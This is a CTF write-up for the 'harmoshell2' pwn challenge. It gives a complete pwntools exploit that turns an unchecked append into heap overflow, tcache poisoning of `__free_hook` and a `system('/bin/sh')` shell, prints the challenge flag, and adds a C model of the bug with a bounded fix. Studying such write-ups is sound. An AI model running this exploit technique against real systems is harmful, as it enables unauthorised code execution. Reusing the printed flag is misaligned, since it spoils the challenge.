[Pwn] harmoshell2 - cpt.shao

xp0int, Posted on Apr 29 2021

The logic is similar to the previous challenge, but there is no longer a stack overflow. Instead, the `echo >` and `echo >>` commands have an out-of-bounds write: `echo >` sets the file's `off` member to the size of the content written, while `echo >>` never checks whether `off + size` exceeds the content buffer, so an append writes straight past the end of the chunk. libc is 2.27, so this heap overflow can be used directly for tcache poisoning to overwrite `__free_hook` with `system`.

Note that there is no ASLR here. The user-space libc address starts with `0x4000xxxxxx`, and the leading `0x4000` does not come out in the leak (only the low bytes are printed), but it can be determined by starting the user-space binary locally. After that the libc address can simply be hardcoded for the `__free_hook` overwrite. This only works because ASLR is off; with ASLR enabled, the base would have to be recovered from a full leak on every run.

```
#flag{iNMLBaSM5KTAIIJLO0MV6XxiR8}
import sys
import time
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = "debug"

env = {'LD_PRELOAD': ''}
if len(sys.argv) == 1:
    p = process('')
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], sys.argv[2])

se = lambda data: p.send(data)
sa = lambda delim, data: p.sendafter(delim, data)
sl = lambda data: p.sendline(data)
sla = lambda delim, data: p.sendlineafter(delim, data)
sea = lambda delim, data: p.sendafter(delim, data)
rc = lambda numb=4096: p.recv(numb)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
info_addr = lambda tag, addr: p.info(tag + ': {:#x}'.format(addr))

# Wrappers for the shell commands of the challenge binary; every prompt ends in "$".
def touch(name):
    sla(b"$", b"touch " + name)

def echo(name, content):
    # echo > : overwrite the content and set off to len(content)
    sla(b"$", b"echo > " + name)
    time.sleep(0.1)
    se(content)
    time.sleep(0.1)

def echo_append(name, content):
    # echo >> : append at off with no check that off + len(content) fits
    sla(b"$", b"echo >> " + name)
    se(content)

def cat(name):
    sla(b"$", b"cat " + name)

def rm(name):
    sla(b"$", b"rm " + name)

# Create and free two files first so their chunks sit in the tcache and get reused.
for i in range(2):
    touch(b"a" * 8)
for i in range(2):
    rm(b"a" * 8)

touch(b"b" * 8)
touch(b"c" * 8)
cat(b"b" * 8)                  # leaks a heap pointer through the reused chunk
ru(b"Content: ")
leak_heap = uu64(ru(b'\n'))
info_addr("leak_heap", leak_heap)

touch(b"d" * 8)
echo(b"c" * 8, b"C" * 0x100)
echo(b"d" * 8, b"D" * 0x100)
echo(b"b" * 8, b"B" * 0x100)   # b's off is now 0x100, the end of its buffer
rm(b"c" * 8)                   # the 0x110 content chunks go into the tcache
rm(b"d" * 8)

# No ASLR: the libc base is fixed by running the user-space binary locally,
# since the leak only yields the low bytes and not the 0x4000 prefix.
libc = 0x4000886000  # 0x400088f000
free_hook = libc + 0x209838
system = libc + 0x1388fe
strlen_got = 0x13038

# Overflow payload appended past b's buffer: rebuilds the headers of the
# following chunks and points the tcache next pointer of the freed 0x110
# chunk (offset 0x40) at __free_hook.
fake = {
    0: 0,
    8: 0x31,
    0x10: 0,
    0x18: 0,
    0x20: 0,
    0x28: 0x100,
    0x30: 0x100,
    0x38: 0x111,
    0x40: free_hook,
    0x48: 0,
}
echo_append(b"b" * 8, flat(fake))

touch(b"e" * 8)
touch(b"f" * 8)
pause()                        # attach a debugger here if needed
echo(b"f" * 8, p64(system))    # the poisoned chunk delivers this write to __free_hook
echo(b"e" * 8, b"/bin/sh\x00")
rm(b"e" * 8)                   # free("/bin/sh") now calls system("/bin/sh")
p.interactive()
```
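The `echo >` / `echo >>` defect described above, as an added example written for this page and not taken from the challenge binary: a minimal model of a file record with a fixed-size heap content buffer, with the unchecked append beside a bounded one. The struct fields, the `0x100` buffer size and the function names are assumptions for illustration; the overrun demo keeps the "neighbour" region inside the same allocation so the corruption is observable without undefined behaviour.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout for illustration: every file owns one 0x100-byte heap
 * buffer, and `off` tracks how much of it is in use. */
#define CONTENT_SIZE 0x100

struct hfile {
    char name[16];
    char *content;   /* heap buffer of CONTENT_SIZE bytes */
    size_t off;      /* bytes in use; echo > sets it, echo >> advances it */
};

/* echo > NAME: overwrite the buffer and set off to the length written. */
int echo_write(struct hfile *f, const char *data, size_t len)
{
    if (len > CONTENT_SIZE)
        return -1;
    memcpy(f->content, data, len);
    f->off = len;
    return 0;
}

/* echo >> NAME as the challenge implements it: the append starts at off,
 * but nothing verifies that off + len still fits in the buffer. */
void echo_append_vuln(struct hfile *f, const char *data, size_t len)
{
    memcpy(f->content + f->off, data, len);
    f->off += len;
}

/* Hardened append. The check is written as len > CONTENT_SIZE - off rather
 * than off + len > CONTENT_SIZE so that a huge len cannot wrap the addition. */
int echo_append_fixed(struct hfile *f, const char *data, size_t len)
{
    if (f->off > CONTENT_SIZE || len > CONTENT_SIZE - f->off)
        return -1;
    memcpy(f->content + f->off, data, len);
    f->off += len;
    return 0;
}

/* Shows the overrun without undefined behaviour: the content buffer and a
 * "neighbour" region share one calloc'd block, standing in for the adjacent
 * heap chunk the exploit corrupts. Returns 1 if the append spilled over. */
int overflow_reaches_neighbour(void)
{
    unsigned char *block = calloc(2, CONTENT_SIZE);
    if (!block)
        return -1;
    struct hfile f = { "bbbbbbbb", (char *)block, 0 };
    char fill[CONTENT_SIZE];
    char payload[0x50];
    memset(fill, 'B', sizeof fill);
    memset(payload, 'X', sizeof payload);

    echo_write(&f, fill, sizeof fill);               /* off == 0x100 */
    echo_append_vuln(&f, payload, sizeof payload);   /* lands at block + 0x100 */

    int hit = block[CONTENT_SIZE] == 'X' &&
              block[CONTENT_SIZE + sizeof payload - 1] == 'X';
    free(block);
    return hit;
}

/* The same sequence against the hardened append: rejected, off unchanged. */
int fixed_rejects_overflow(void)
{
    char buf[CONTENT_SIZE];
    struct hfile f = { "bbbbbbbb", buf, 0 };
    char fill[CONTENT_SIZE];
    char payload[0x50];
    memset(fill, 'B', sizeof fill);
    memset(payload, 'X', sizeof payload);

    echo_write(&f, fill, sizeof fill);
    int rc = echo_append_fixed(&f, payload, sizeof payload);
    return rc == -1 && f.off == CONTENT_SIZE;
}

/* An append that exactly fills the buffer must still be accepted. */
int fixed_allows_exact_fit(void)
{
    char buf[CONTENT_SIZE];
    struct hfile f = { "bbbbbbbb", buf, 0 };
    char half[CONTENT_SIZE / 2];
    memset(half, 'A', sizeof half);

    if (echo_write(&f, half, sizeof half) != 0)
        return 0;
    if (echo_append_fixed(&f, half, sizeof half) != 0)
        return 0;
    return f.off == CONTENT_SIZE && buf[CONTENT_SIZE - 1] == 'A';
}

int main(void)
{
    printf("vulnerable append corrupts neighbour: %d\n", overflow_reaches_neighbour());
    printf("fixed append rejects overflow:        %d\n", fixed_rejects_overflow());
    printf("fixed append allows exact fit:        %d\n", fixed_allows_exact_fit());
    return 0;
}
```

The exploit relies on exactly the gap `echo_append_vuln` leaves: after `echo >` has set `off` to `0x100`, a single `echo >>` writes its whole payload beyond the buffer, which is where the fake chunk headers and the poisoned tcache pointer in the script land.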